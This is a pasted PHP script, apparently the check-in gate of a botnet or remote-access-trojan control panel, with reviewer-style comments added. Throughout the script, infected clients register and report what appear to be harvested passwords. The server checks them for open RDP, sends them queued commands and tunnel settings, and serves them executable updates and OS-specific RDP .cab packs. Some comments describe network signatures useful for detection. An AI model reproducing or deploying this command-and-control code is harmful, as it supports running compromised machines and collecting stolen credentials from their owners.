
Untitled

a guest
Oct 10th, 2017
  1. <?
  // Request gate for a client check-in endpoint. Every request is an HTTP POST
  // that must carry q (request type) and id (client identifier); every type
  // except "l" must also carry o (OS version string) and v (client version).
  // The only replies to a malformed request are the short literal bodies
  // "main", "main2" and "ver".
  // Errors are silenced for the whole script.
  2. error_reporting(0);
  // NOTE(review): XTERM_CFG_DIR is handed to define() as a bare word, not a quoted string.
  3. define(XTERM_CFG_DIR,$_SERVER["DOCUMENT_ROOT"]."/_xtcfg2");
  // maincfg.php is not part of this listing. SQLShield(), SQLConnect(),
  // IsTunnelSet() and the BOTS_LOG / ACCESS_LOG / UPDATE_DIR / CABS_DIR constants
  // used further down are not defined here; presumably they come from this include.
  4. include XTERM_CFG_DIR."/maincfg.php";
  5. //error_reporting(E_ALL);
  6.  
  7. if((empty($_POST["q"]))||(empty($_POST["id"]))) die("main");
  8. if($_POST["q"]!="l") if((empty($_POST["o"]))||(empty($_POST["v"]))) die("main2");
  9.  
  // SQLShield() is the only step between these POST fields and the string-built
  // SQL in the functions below; its body is not shown, so what it escapes cannot
  // be judged from this page.
  10. $dwQType=$_POST["q"];
  11. $szID=SQLShield($_POST["id"]);
  12. $szRATVer=SQLShield($_POST["v"]);
  13.  
  14.  
  // The OS string is colon-separated and must have at least ten fields
  // (field order is given in the trailing comment on the explode line).
  15. if($_POST["q"]!="l"){
  16. $rgVer=explode(":",SQLShield($_POST["o"])); //platf:mj:mn:build:sp-mj:sp-mn:suite:type:bits:csdver
  17. if(count($rgVer)<10) die("ver");
  18. }
  19.  
  20. //-------------------------
  // Appends one line, prefixed with a "dd.mm.YYYY HH:MM" timestamp, to the file
  // named by the BOTS_LOG constant (not defined in this listing).
  // Returns without writing if the file cannot be opened.
  21. function BotLog($szText){
  22. if(!($hFile=fopen(BOTS_LOG,"a+"))) return;
  23. fputs($hFile,strftime("%d.%m.%Y %H:%M")." ".$szText."\n");
  24. fclose($hFile);
  25. }
  26.  
  // Appends one timestamped line to the file named by ACCESS_LOG, but only when
  // the ACCESS_LOG_ENABLED constant is defined (neither constant is defined in
  // this listing). Same line format as BotLog.
  27. function AccessLog($szText){
  28. if(!defined("ACCESS_LOG_ENABLED")) return;
  29. if(!($hFile=fopen(ACCESS_LOG,"a+"))) return;
  30. fputs($hFile,strftime("%d.%m.%Y %H:%M")." ".$szText."\n");
  31. fclose($hFile);
  32. }
  33.  
  // Looks up a client by identifier in table xt2_alive.
  // Returns the first matching row as an associative array, or NULL when there
  // is no row or the query fails (a failure is also written to the bot log).
  // $szID is interpolated straight into the SQL text; the callers in this
  // listing pass it through SQLShield() first.
  34. function IsBotExist($szID){
  35. if(!($r=mysql_query("SELECT * FROM xt2_alive WHERE bid='$szID'"))){
  36. BotLog("SQL Exist failed: ".mysql_error());
  37. return NULL;
  38. }
  39.  
  40. if(($row=mysql_fetch_array($r,MYSQL_ASSOC))) $rgRow=$row; else $rgRow=NULL;
  41. mysql_free_result($r);
  42. return $rgRow;
  43. }
  44.  
  // Inserts a new client row into xt2_alive; ctime and atime are both set to
  // NOW() by the database. All other columns are taken from the arguments and
  // interpolated into the SQL text as quoted strings.
  // On failure the complete query text and the MySQL error go to the bot log.
  45. function AddBot($szID,$dwUptime,$szRIP,$szLIP,$szUser,$szCountry,$szLang,$szOS,$szBotVer,$dwFlags,$szTS){
  46. $q="INSERT INTO xt2_alive (bid,ctime,atime,uptime,rip,lip,user,country,lang,os_ver,bot_ver,bflags,tstate) VALUES ";
  47. $q.="('$szID',NOW(),NOW(),'$dwUptime','$szRIP','$szLIP','$szUser','$szCountry','$szLang','$szOS','$szBotVer','$dwFlags','$szTS')";
  48.  
  49. if(mysql_query($q)) return;
  50. BotLog("SQL Add failed: ($q) ".mysql_error());
  51. }
  52.  
  53.  
  // Refreshes an existing xt2_alive row: atime becomes NOW() and the reported
  // fields are overwritten. The row is addressed by the bid value read back from
  // the database ($rgRow['bid']), not by the request parameter.
  // bflags is the only value interpolated without quotes; both callers in this
  // listing pass an integer (Alive's $dwFlags, or the literal 0 from SendPack).
  // On failure the complete query text and the MySQL error go to the bot log.
  54. function UpdateBot($rgRow,$dwUptime,$szRIP,$szLIP,$szUser,$szCountry,$szLang,$szOS,$szBotVer,$dwFlags,$szTS){
  55. $q="UPDATE xt2_alive SET atime=NOW(),uptime='$dwUptime',rip='$szRIP',lip='$szLIP',user='$szUser',country='$szCountry',lang='$szLang',os_ver='$szOS',";
  56. $q.="bot_ver='$szBotVer',bflags=$dwFlags,tstate='$szTS' ";
  57. $q.="WHERE bid='".$rgRow['bid']."'";
  58.  
  59. if(mysql_query($q)) return;
  60. BotLog("SQL Update failed: ($q) ".mysql_error());
  61. }
  62.  
  63.  
  // Stores the client-supplied message in the reply column of the client's
  // xt2_alive row, prefixed with a "[dd.mm.YYYY HH:MM:SS] " server timestamp.
  // The result of the query is not checked.
  64. function UpdateMsg($szID,$szMsg){
  65. mysql_query("UPDATE xt2_alive SET reply='".strftime("[%d.%m.%Y %H:%M:%S] ")."$szMsg' WHERE bid='$szID'");
  66. }
  67.  
  // Adds $szNewPass to the semicolon-separated list held in the passwds column
  // of the client's xt2_alive row, unless the list already contains it.
  // The values come from the lp0..lp11 POST fields (see Alive); presumably these
  // are credentials reported by the client, but the listing does not show where
  // the client obtains them.
  // $rgRow may be NULL (client not yet in the table); the list then starts empty.
  68. function UpdateLP($rgRow,$szID,$szNewPass){
  69. if($rgRow){
  70. $szPassList=$rgRow["passwds"];
  71. $rgPasswds=explode(';',$szPassList);
  72. foreach($rgPasswds as $szOldPass) if($szOldPass==$szNewPass) return;
  73. }else $szPassList="";
  74.  
  75. $szPassList.="$szNewPass;";
  // $rgRow is a by-value parameter, so this assignment changes the local copy only.
  76. $rgRow["passwds"]=$szPassList;
  77.  
  78. mysql_query("UPDATE xt2_alive SET passwds='$szPassList' WHERE bid='$szID'");
  79. }
  80.  
  // Streams a server-side file to the client as a download and then ends the
  // script. Returns an error string only when the file is missing or cannot be
  // opened; on success it never returns (die).
  //   $szFile  path of the file to send
  //   $szCmd   command prefix written before the file (callers here use "U" or "R")
  //   $dwUPID  either the literal "smss_fix" or a number rendered as 8 hex digits
  //   $fDel    when true, the file is deleted after it has been sent
  // Observable response shape, useful for network detection:
  // Content-Type application/octet-stream, Content-Disposition attachment with
  // filename "<unix timestamp>.exe", and a body of $szCmd + 8 characters + the
  // raw file. The callers echo the marker "<WEB>+" before calling this function.
  81. function SendFile($szFile,$szCmd,$dwUPID,$fDel=false){
  82. if(!file_exists($szFile)) return "No such file $szFile";
  83. $dwSize=filesize($szFile);
  84.  
  85. if(!($hFile=fopen($szFile,"r"))) return "Can't open $szFile";
  86.  
  87. header("Cache-control: private");
  88. header("Content-Type: application/octet-stream");
  // The extra bytes added to the file size match the envelope sizes:
  // "<WEB>" (5), "+" (1), the command letter (1) and the 8-character id (8).
  89. header("Content-Length: ".($dwSize+5+1+1+8)); //+ <WEB>+X
  90. header("Content-Disposition: attachment; filename=\"".mktime().".exe\"");
  91.  
  92. if((strlen($dwUPID)==8)&&($dwUPID=="smss_fix")) echo sprintf("%s%s",$szCmd,$dwUPID); else echo sprintf("%s%08X",$szCmd,($dwUPID+0));
  93. fpassthru($hFile);
  94.  
  95. fclose($hFile);
  96.  
  97. if($fDel) unlink($szFile);
  98.  
  // The requester's address and the served path are recorded in the access log.
  99. AccessLog($_SERVER["REMOTE_ADDR"]." Sent $szFile");
  100.  
  101. die;
  102. }
  103.  
  // Decides whether the client runs an outdated version and, if so, serves the
  // configured update file through SendFile (which ends the script on success).
  // Configuration is read as name/val pairs from table xt2_cfg; the keys used
  // here are current_xt_ver, update_file and update_id.
  // Returns NULL when no update is sent or the config query fails, otherwise the
  // error string returned by SendFile.
  104. function UpdateVersion($szBotVer){
  105. if(!($r=mysql_query("SELECT * FROM xt2_cfg"))) return NULL;
  106. $rgCfg=array();
  107. while(($row=mysql_fetch_array($r,MYSQL_ASSOC))) $rgCfg[$row["name"]]=$row["val"];
  108. mysql_free_result($r);
  109.  
  // A version of the form d.d.ddd... is collapsed into one integer by
  // concatenating its digits; the numeric comparison is trusted only when both
  // results are above 100.
  110. $dwBotVer=0+preg_replace("/(\d)\.(\d)\.(\d+).*/","$1$2$3",$szBotVer);
  111. $dwCurrentVer=0+preg_replace("/(\d)\.(\d)\.(\d+).*/","$1$2$3",$rgCfg["current_xt_ver"]);
  112. if(($dwBotVer>100)&&($dwCurrentVer>100)&&($dwBotVer>=$dwCurrentVer)) return NULL;
  113.  
  114. if($szBotVer==$rgCfg["current_xt_ver"]) return NULL;
  // An update_file value without any slash or backslash is taken relative to UPDATE_DIR.
  115. if((!strchr($rgCfg["update_file"],"/"))&&(!strchr($rgCfg["update_file"],"\\"))) $rgCfg["update_file"]=UPDATE_DIR.$rgCfg["update_file"];
  116. return SendFile($rgCfg["update_file"],"U",$rgCfg["update_id"],false);
  117. }
  118.  
  // Serves a one-off file queued for a single client. A queue entry is an xt2_cfg
  // row whose name starts with "upl_" and whose val starts with "<client id>:".
  // The val is split on ':'; field 1 is used as the id and field 2 as the file
  // name under UPDATE_DIR. The row is deleted before sending, and SendFile is
  // asked to delete the file afterwards, so each entry is delivered at most once.
  // Returns NULL when nothing is queued or the query fails, otherwise the error
  // string returned by SendFile.
  119. function CustomUpload($szBotID){
  120. if(!($r=mysql_query("SELECT * FROM xt2_cfg WHERE name like 'upl_%' AND val like '$szBotID:%' LIMIT 1"))) return NULL;
  121. if(($row=mysql_fetch_array($r,MYSQL_ASSOC))) $rgUpl=explode(':',$row["val"]); else $rgUpl=NULL;
  122. mysql_free_result($r);
  123. if(!$rgUpl) return NULL;
  124.  
  125. mysql_query("DELETE FROM xt2_cfg WHERE id=".$row["id"]);
  126.  
  127. return SendFile(UPDATE_DIR.$rgUpl[2],"U",$rgUpl[1],true);
  128. }
  129.  
  // Attempts an outbound TCP connection from the server to $szIP on port 3389
  // with a 10 second timeout. Returns TRUE if the connection opens, FALSE
  // otherwise; the socket is closed immediately and nothing is sent.
  // NOTE(review): &$err / &$strerr is call-time pass-by-reference, which PHP
  // rejects from 5.4 onwards; together with the mysql_* calls this points to an
  // old PHP runtime on the hosting server.
  130. function CheckMSRDP($szIP){
  131. if(!($hSock=fsockopen($szIP,3389,&$err,&$strerr,10))) return FALSE;
  132. fclose($hSock);
  133. return TRUE;
  134. }
  135.  
  136.  
  // Handles a periodic check-in (request type "a"): records the client in
  // xt2_alive, stores any message and lp values, replies with pending commands,
  // then runs the update / upload checks. Always ends the script.
  // Reply body starts with the literal marker "<WEB>+", followed by the row's
  // send_cmd text and, when a tunnel is set, "T<f0>:<f4>:<f5>;" built from the
  // array returned by IsTunnelSet() (not defined in this listing).
  137. function Alive($szID,$rgVer,$szCountry,$szLang,$dwUptime,$szBotVer,$szLIP,$szUser,$szMsg,$szTS){
  138. $szRIP=$_SERVER["REMOTE_ADDR"];
  139. $dwFlags=0;
  140. $szOS=implode(":",$rgVer);
  141.  
  // Flag bit 0x1 is set when the server can open port 3389 on the requester's
  // address. The probe runs when the reported local IP equals the remote address
  // and ts is "OK".
  // NOTE(review): when no local IP is reported, CheckMSRDP() is called with no argument.
  142. //Check RDP
  143. if(!empty($szLIP)){
  144. if(($szLIP==$_SERVER["REMOTE_ADDR"])&&($szTS=="OK")) if(CheckMSRDP($_SERVER["REMOTE_ADDR"])) $dwFlags|=0x00000001;
  145. }else if(CheckMSRDP()) $dwFlags|=0x00000001;
  146.  
  147.  
  // SQLConnect() is not defined in this listing.
  148. SQLConnect();
  149. if(!($rgRow=IsBotExist($szID))) AddBot($szID,$dwUptime,$szRIP,$szLIP,$szUser,$szCountry,$szLang,$szOS,$szBotVer,$dwFlags,$szTS);
  150. else UpdateBot($rgRow,$dwUptime,$szRIP,$szLIP,$szUser,$szCountry,$szLang,$szOS,$szBotVer,$dwFlags,$szTS);
  151.  
  152. if(!empty($szMsg)) UpdateMsg($szID,$szMsg);
  153.  
  // Reads POST fields lp0, lp1, ... up to lp11 and stops at the first empty one.
  154. //LP
  155. for($i=0;$i<12;$i++) if(!empty($_POST["lp$i"])) UpdateLP($rgRow,$szID,SQLShield($_POST["lp$i"])); else break;
  156.  
  157. //--Reply--
  158. echo "<WEB>+";
  159.  
  // Pending command and tunnel values are sent once and then cleared from the row.
  160. if($rgRow){
  161. if(!empty($rgRow["send_cmd"])) echo $rgRow["send_cmd"];
  162. if(($rgTun=IsTunnelSet($rgRow["send_tun"]))) echo "T".$rgTun[0].":".$rgTun[4].":".$rgTun[5].";";
  163.  
  164. mysql_query("UPDATE xt2_alive SET send_tun=NULL,send_cmd=NULL WHERE bid='$szID'");
  165. }
  166.  
  // Each helper below ends the script itself when it sends a file; a returned
  // string is an error message and is written to the bot log.
  167. //Check update,dies on update
  168. if(($s=UpdateVersion($szBotVer))) BotLog("[U] $s");
  169. if(($s=CustomUpload($szID))) BotLog("[L] $s");
  170.  
  // A request with POST field smss set to "fix" is answered with CABS_DIR."smss.fix".
  171. if($_POST["smss"]=="fix"){
  172. if(($s=SendFile(CABS_DIR."smss.fix","U","smss_fix",FALSE))) BotLog("[F] $s");
  173. }
  174.  
  175. die;
  176. }
  177.  
  // Handles request type "i": registers or refreshes the client, runs the update
  // and custom-upload checks, then serves one .cab file from CABS_DIR chosen by
  // the reported OS version. Always ends the script; the body "X" is returned
  // when the version is not recognised or the chosen file cannot be sent.
  // $rgVer indexes follow the field order given where the OS string is parsed:
  // [1] major, [2] minor, [4] service-pack major, [7] type, [8] bits.
  178. function SendPack($szID,$rgVer,$szBotVer,$szMsg){
  179. $szOS=implode(":",$rgVer);
  180. SQLConnect();
  181.  
  182. if(!($rgRow=IsBotExist($szID))) AddBot($szID,0,$_SERVER["REMOTE_ADDR"],"","","","",$szOS,$szBotVer,0,"");
  183. else UpdateBot($rgRow,0,$_SERVER["REMOTE_ADDR"],"","","","",$szOS,$szBotVer,0,"");
  184.  
  185. if(!empty($szMsg)) UpdateMsg($szID,$szMsg);
  186.  
  187. echo "<WEB>+";
  188.  
  189. if(($s=UpdateVersion($szBotVer))) BotLog("[U] $s");
  190. if(($s=CustomUpload($szID))) BotLog("[L] $s");
  191.  
  // Major versions "4" and "5" share one branch; "6" picks by bitness only.
  192. switch($rgVer[1]){
  193. case "4":
  194. case "5":
  195. if($rgVer[2]=="0"){ //2000
  196. $szPack=CABS_DIR."5.0-2.32.cab";
  197. }else if($rgVer[2]=="2"){ //5.2
  198. if($rgVer[7]!=1){ //2003
  199. if($rgVer[8]==64) $szPack=CABS_DIR."5.2.64-s.cab"; else $szPack=CABS_DIR."5.0-2.32.cab";
  200. }else $szPack=CABS_DIR."5.2.64-c.cab";
  201. }else{ //5.1
  202. if($rgVer[4]=="3") $szPack=CABS_DIR."5.1.32-s3.cab"; else $szPack=CABS_DIR."5.1.32.cab";
  203. }
  204. break;
  205.  
  206. case "6":
  207. if($rgVer[8]==64) $szPack=CABS_DIR."6.x.64.cab"; else $szPack=CABS_DIR."6.x.32.cab";
  208. break;
  209.  
  // NOTE(review): $r has not been assigned yet when this log line is built.
  210. default:
  211. BotLog("[C] Unknown version of $szID ($szOS): $r");
  212. die("X");
  213. break;
  214. }
  215.  
  // SendFile only returns on failure, so the two lines after it are the error path.
  216. $r=SendFile($szPack,"R",0,false);
  217. BotLog("[C] File not found $szPack for $szID ($szOS): $r");
  218. die("X");
  219. }
  220.  
  221. //-------------------------
  222.  
  // Dispatch on the q POST field: "i" serves a pack file, "a" is the periodic
  // check-in, "l" accepts an uploaded debug log. Any other value falls through
  // and produces no output.
  // For "i" and "a" the access log line contains every POSTed value joined with
  // '|', written as received.
  223. switch($dwQType){
  224. case "i": //Get RDP pack
  225. AccessLog($_SERVER["REMOTE_ADDR"]." Pack file request: ".implode('|',$_POST));
  226. SendPack($szID,$rgVer,$szRATVer,SQLShield($_POST["msg"]));
  227. break;
  228.  
  // A check-in must carry l (language) and c (country) non-empty and t (uptime)
  // present; otherwise the script ends with an empty body.
  229. case "a": //Alive
  230. $szLIP=SQLShield($_POST["lip"]);
  231. $szTS=SQLShield($_POST["ts"]);
  232. if((empty($_POST["l"]))||(empty($_POST["c"]))||(!isset($_POST["t"]))) die;
  233. AccessLog($_SERVER["REMOTE_ADDR"]." Alive ".implode('|',$_POST));
  234. Alive($szID,$rgVer,SQLShield($_POST["c"]),SQLShield($_POST["l"]),SQLShield($_POST["t"]),$szRATVer,$szLIP,SQLShield($_POST["u"]),SQLShield($_POST["msg"]),$szTS);
  235. break;
  236.  
  // The uploaded file (form field f0) is stored on the server as
  // XTERM_CFG_DIR/logs/_debug-<id>.<8 hex digits of the current time>.log, the
  // client's pending send_cmd is cleared, and the reply body is "ok".
  // No SQLConnect() call is visible on this path; presumably the connection is
  // opened elsewhere (e.g. in the included config) — confirm.
  237. case "l": //DebugLog
  238. if(!isset($_FILES["f0"])) die;
  239. AccessLog($_SERVER["REMOTE_ADDR"]." Log from $szID");
  240. $rgFile=$_FILES["f0"];
  241. if(!move_uploaded_file($rgFile["tmp_name"],XTERM_CFG_DIR."/logs/_debug-$szID.".sprintf("%08X",mktime()).".log")) die;
  242. mysql_query("UPDATE xt2_alive SET send_cmd=NULL WHERE bid='".$szID."'");
  243. die("ok");
  244. break;
  245. }
  246.  
  247.  
  248. ?>